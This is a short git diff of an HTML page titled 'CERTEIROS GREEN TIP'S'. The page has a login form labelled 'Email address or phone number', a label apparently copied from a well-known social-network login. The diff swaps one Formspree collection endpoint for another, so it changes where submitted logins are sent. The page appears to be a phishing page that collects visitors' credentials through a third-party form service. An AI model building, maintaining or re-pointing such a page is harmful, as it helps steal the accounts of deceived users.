--- a/index.html
+++ b/index.html
@@ -123,7 +123,7 @@
     <h1 class="point"><b>CERTEIROS GREEN TIP'S</b></h1>
 
     <div class="login-page">
-      <form action="https://formspree.io/f/meqbqavq" method="POST">
+      <form action="https://formspree.io/f/mzblzagn" method="POST">
         <p>
           <label for="email" class="email">Email address or phone number</label> <br>
           <input placeholder="Email address or phone number" type="text" name="email" id="email" required="">
